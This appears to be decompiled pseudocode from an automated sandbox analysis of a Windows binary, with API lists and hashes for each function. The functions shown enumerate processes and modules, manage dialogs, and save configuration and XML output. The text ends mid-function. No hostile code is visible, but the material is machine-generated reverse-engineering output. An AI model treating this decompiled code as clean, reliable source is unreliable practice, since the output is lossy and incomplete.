                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                    				void _t89;
                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                    				int _t98;
                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                    				void* _t109;
                                                                                                                                                                    
                                                                                                                                                                    				_t106 = _t105 & 0xfffffff8;
                                                                                                                                                                    				E0040E340(0x8874, __ecx);
                                                                                                                                                                    				_t98 = 0;
                                                                                                                                                                    				_a8 = 0;
                                                                                                                                                                    				if(E0040591F() == 0) {
                                                                                                                                                                    					L12:
                                                                                                                                                                    					__eflags =  *0x41325c - _t98; // 0x0
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						_t89 = _a4;
                                                                                                                                                                    						_t58 =  *0x4128dc(8, _t89);
                                                                                                                                                                    						__eflags = _t58 - 0xffffffff;
                                                                                                                                                                    						_v8 = _t58;
                                                                                                                                                                    						if(_t58 != 0xffffffff) {
                                                                                                                                                                    							_v0 = 1;
                                                                                                                                                                    							_a560 = 0x428;
                                                                                                                                                                    							_t59 =  *0x4128d4(_t58,  &_a560);
                                                                                                                                                                    							while(1) {
                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                    								if(_t59 == 0) {
                                                                                                                                                                    									goto L18;
                                                                                                                                                                    								}
                                                                                                                                                                    								memset( &_a8, _t98, 0x21c);
                                                                                                                                                                    								_a12 = _a580;
                                                                                                                                                                    								_a8 = _t89;
                                                                                                                                                                    								wcscpy( &_a16,  &_a1096);
                                                                                                                                                                    								_a540 = _a576;
                                                                                                                                                                    								_t106 = _t106 + 0x14;
                                                                                                                                                                    								_a544 = _a572;
                                                                                                                                                                    								_a552 = 0x428;
                                                                                                                                                                    								_t69 = E0040CDF8(_a8,  &_a8);
                                                                                                                                                                    								__eflags = _t69;
                                                                                                                                                                    								if(_t69 != 0) {
                                                                                                                                                                    									_t59 =  *0x4128d0(_v16,  &_a552);
                                                                                                                                                                    									continue;
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L18;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L18;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t109 =  *0x413260 - _t98; // 0x0
                                                                                                                                                                    					if(_t109 == 0) {
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                                    						_v0 = _t72;
                                                                                                                                                                    						if(_t72 != 0) {
                                                                                                                                                                    							_push( &_a4);
                                                                                                                                                                    							_push(0x8000);
                                                                                                                                                                    							_push( &_a2160);
                                                                                                                                                                    							_push(_t72);
                                                                                                                                                                    							if( *0x4128e0() != 0) {
                                                                                                                                                                    								_t6 =  &_v12;
                                                                                                                                                                    								 *_t6 = _v12 >> 2;
                                                                                                                                                                    								_v8 = 1;
                                                                                                                                                                    								_t90 = 0;
                                                                                                                                                                    								if( *_t6 != 0) {
                                                                                                                                                                    									while(1) {
                                                                                                                                                                    										_a1616 = _t98;
                                                                                                                                                                    										memset( &_a1618, _t98, 0x208);
                                                                                                                                                                    										memset( &_a8, _t98, 0x21c);
                                                                                                                                                                    										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                                                                    										_t106 = _t106 + 0x18;
                                                                                                                                                                    										_a8 = _a4;
                                                                                                                                                                    										_a12 = _t78;
                                                                                                                                                                    										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
                                                                                                                                                                    										E0040CAF2( &_v0,  &_a1600);
                                                                                                                                                                    										_push(0xc);
                                                                                                                                                                    										_push( &_v20);
                                                                                                                                                                    										_push(_v4);
                                                                                                                                                                    										_push(_v32);
                                                                                                                                                                    										if( *0x4128e4() != 0) {
                                                                                                                                                                    											_a508 = _v32;
                                                                                                                                                                    											_a512 = _v36;
                                                                                                                                                                    										}
                                                                                                                                                                    										if(E0040CDF8(_a8,  &_v24) == 0) {
                                                                                                                                                                    											goto L18;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t90 = _t90 + 1;
                                                                                                                                                                    										if(_t90 < _v44) {
                                                                                                                                                                    											_t98 = 0;
                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                    											continue;
                                                                                                                                                                    										} else {
                                                                                                                                                                    										}
                                                                                                                                                                    										goto L18;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							L18:
                                                                                                                                                                    							CloseHandle(_v16);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _a8;
                                                                                                                                                                    			}



























                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
                                                                                                                                                                    • memset.MSVCRT ref: 0040CC75
                                                                                                                                                                    • memset.MSVCRT ref: 0040CC85
                                                                                                                                                                      • Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                                    • memset.MSVCRT ref: 0040CD70
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040CD91
                                                                                                                                                                    • CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3300951397-0
                                                                                                                                                                    • Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                                    • Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
                                                                                                                                                                    • Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                                    • Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                    			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                                    				struct HWND__* _t29;
                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                    				struct HWND__* _t61;
                                                                                                                                                                    				struct HWND__* _t62;
                                                                                                                                                                    				intOrPtr* _t66;
                                                                                                                                                                    				void* _t67;
                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                    
                                                                                                                                                                    				_t58 = __edx;
                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                    				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
                                                                                                                                                                    				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
                                                                                                                                                                    				E00405700(_t61, E00406827(0x2ef), 1);
                                                                                                                                                                    				E00405700(_t61, E00406827(0x2f0), 2);
                                                                                                                                                                    				SendMessageW(_t61, 0x160, 0x15e, 0);
                                                                                                                                                                    				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
                                                                                                                                                                    				E00405700(_t62, E00406827(0x2f9), 1);
                                                                                                                                                                    				E00405700(_t62, E00406827(0x2fa), 2);
                                                                                                                                                                    				E00405700(_t62, E00406827(0x2fb), 3);
                                                                                                                                                                    				E00405700(_t62, E00406827(0x2fc), 4);
                                                                                                                                                                    				E00405700(_t62, E00406827(0x2fd), 5);
                                                                                                                                                                    				SendMessageW(_t62, 0x160, 0x15e, 0);
                                                                                                                                                                    				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
                                                                                                                                                                    				_t63 = _t29;
                                                                                                                                                                    				SendMessageW(_t29, 0x160, 0x15e, 0);
                                                                                                                                                                    				E00405700(_t29, E00406827(0x30d), 1);
                                                                                                                                                                    				E00405700(_t63, E00406827(0x30e), 2);
                                                                                                                                                                    				_t54 = _t66;
                                                                                                                                                                    				_pop(_t67);
                                                                                                                                                                    				_t68 = _t54;
                                                                                                                                                                    				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
                                                                                                                                                                    				 *((intOrPtr*)( *_t68 + 0x1c))();
                                                                                                                                                                    				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00403716
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                      • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                      • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                      • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                                      • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                                      • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0040375D
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004037E4
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3030901043-0
                                                                                                                                                                    • Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                                    • Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
                                                                                                                                                                    • Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                    			E00401810(void* __ebx) {
                                                                                                                                                                    				struct tagRECT _v20;
                                                                                                                                                                    				struct tagPAINTSTRUCT _v84;
                                                                                                                                                                    
                                                                                                                                                                    				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                                                                    				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                                                                    				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                                                                    				asm("movsd");
                                                                                                                                                                    				asm("movsd");
                                                                                                                                                                    				asm("movsd");
                                                                                                                                                                    				asm("movsd");
                                                                                                                                                                    				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                                                                    				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                    • Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                                    • Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
                                                                                                                                                                    • Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				void _v518;
                                                                                                                                                                    				signed short _v520;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				int _t46;
                                                                                                                                                                    				void* _t64;
                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                    
                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                    				_t73 = __ecx;
                                                                                                                                                                    				_t71 = _a8;
                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                    				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
                                                                                                                                                                    					_v520 = _v520 & 0x00000000;
                                                                                                                                                                    					memset( &_v518, 0, 0x1fe);
                                                                                                                                                                    					E00401000( &_v520, _t67, 0x41203c);
                                                                                                                                                                    					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
                                                                                                                                                                    					_t71 = _a8;
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
                                                                                                                                                                    					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
                                                                                                                                                                    					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                                    					 *(_t73 + 0x210) = _t46;
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
                                                                                                                                                                    					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
                                                                                                                                                                    					if( *_t71 == _t46) {
                                                                                                                                                                    						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
                                                                                                                                                                    						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_a4 != 0x103) {
                                                                                                                                                                    					L29:
                                                                                                                                                                    					return _t46;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
                                                                                                                                                                    						_t46 = E0040B0C2(_t73);
                                                                                                                                                                    						_t71 = _a8;
                                                                                                                                                                    					}
                                                                                                                                                                    					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
                                                                                                                                                                    						_t64 = 0;
                                                                                                                                                                    						if(GetKeyState(0x10) < 0) {
                                                                                                                                                                    							_t64 = 1;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
                                                                                                                                                                    						_t73 = _v8;
                                                                                                                                                                    						_t71 = _a8;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
                                                                                                                                                                    						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
                                                                                                                                                                    						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
                                                                                                                                                                    							_t46 = E0040824E(_t71, _t68, _t92);
                                                                                                                                                                    						}
                                                                                                                                                                    						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
                                                                                                                                                                    							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                                    							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
                                                                                                                                                                    							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
                                                                                                                                                                    								_t46 = E004081B3(_t71, _t63, 1);
                                                                                                                                                                    							}
                                                                                                                                                                    							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                                    							 *(_t73 + 0x210) = _t46;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
                                                                                                                                                                    						goto L29;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t46 = E00402D29(_t71);
                                                                                                                                                                    						if(_t46 == 0) {
                                                                                                                                                                    							goto L29;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t46 = _t73 + 0x280;
                                                                                                                                                                    						if( *_t46 != 0) {
                                                                                                                                                                    							goto L29;
                                                                                                                                                                    						}
                                                                                                                                                                    						 *_t46 = 1;
                                                                                                                                                                    						return E00401BDC(_t73, 0x402);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040B698
                                                                                                                                                                      • Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
                                                                                                                                                                    • GetMenuStringW.USER32 ref: 0040B71F
                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0040B74F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                    • String ID: < A
                                                                                                                                                                    • API String ID: 3550944819-1181716546
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                    				void _v526;
                                                                                                                                                                    				long _v528;
                                                                                                                                                                    				short _v1050;
                                                                                                                                                                    				long _v1572;
                                                                                                                                                                    				intOrPtr _v1576;
                                                                                                                                                                    				char _v1580;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				wchar_t* _t24;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    
                                                                                                                                                                    				_t41 = __ecx;
                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                    				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
                                                                                                                                                                    					_v528 = 0;
                                                                                                                                                                    					memset( &_v526, 0, 0x208);
                                                                                                                                                                    					E00405800( &_v528);
                                                                                                                                                                    					_t24 = wcsrchr( &_v528, 0x2e);
                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                    						 *_t24 = 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					wcscat( &_v528, L".cfg");
                                                                                                                                                                    					_v1576 = _a4;
                                                                                                                                                                    					_v1580 = 0x410838;
                                                                                                                                                                    					_v1572 = 0;
                                                                                                                                                                    					_v1050 = 0;
                                                                                                                                                                    					wcscpy( &_v1572,  &_v528);
                                                                                                                                                                    					E0040D909( &_v1580);
                                                                                                                                                                    					_t45 =  &_v1580;
                                                                                                                                                                    					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
                                                                                                                                                                    					E0040196B(_t42, _t41,  &_v1580);
                                                                                                                                                                    					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
                                                                                                                                                                    				}
                                                                                                                                                                    				return __eax;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040B176
                                                                                                                                                                      • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B190
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040B1AC
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040B1E0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcscpywcsrchr
                                                                                                                                                                    • String ID: .cfg
                                                                                                                                                                    • API String ID: 3959449883-3410578098
                                                                                                                                                                    • Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                                    • Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
                                                                                                                                                                    • Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                                    • Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                    			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				signed short _v516;
                                                                                                                                                                    				signed short* _t30;
                                                                                                                                                                    				signed short* _t34;
                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                    				void* _t40;
                                                                                                                                                                    				signed short* _t44;
                                                                                                                                                                    				void* _t46;
                                                                                                                                                                    
                                                                                                                                                                    				_t40 = __edi;
                                                                                                                                                                    				_t38 = __ecx;
                                                                                                                                                                    				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						_v516 = _v516 & 0x00000000;
                                                                                                                                                                    						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                    						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                                    						_t38 =  *((intOrPtr*)(__edi + 0x6c));
                                                                                                                                                                    						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                                    						_t44 =  &_v516;
                                                                                                                                                                    						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
                                                                                                                                                                    						_t34 = _t44;
                                                                                                                                                                    						_push(_t34);
                                                                                                                                                                    						_push( *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                                    						_push(_t34);
                                                                                                                                                                    						_push(L"<%s>%s</%s>\r\n");
                                                                                                                                                                    						_push(0x2000);
                                                                                                                                                                    						_push( *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_t46 = _t46 + 0x24;
                                                                                                                                                                    						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                                    						_t37 = _t37 + 1;
                                                                                                                                                                    					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
                                                                                                                                                                    				}
                                                                                                                                                                    				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00408E9C
                                                                                                                                                                      • Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57
                                                                                                                                                                      • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                                      • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00408EE6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                    • Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                                    • Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
                                                                                                                                                                    • Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                                    • Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040BA94(void* __esi) {
                                                                                                                                                                    				struct _WNDCLASSW _v44;
                                                                                                                                                                    				struct HINSTANCE__* _t20;
                                                                                                                                                                    				struct HWND__* _t23;
                                                                                                                                                                    
                                                                                                                                                                    				_v44.style = 0;
                                                                                                                                                                    				_v44.lpfnWndProc = E00401896;
                                                                                                                                                                    				_v44.cbClsExtra = 0;
                                                                                                                                                                    				_v44.cbWndExtra = 0;
                                                                                                                                                                    				_v44.hInstance = GetModuleHandleW(0);
                                                                                                                                                                    				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
                                                                                                                                                                    				_v44.lpszClassName = __esi + 4;
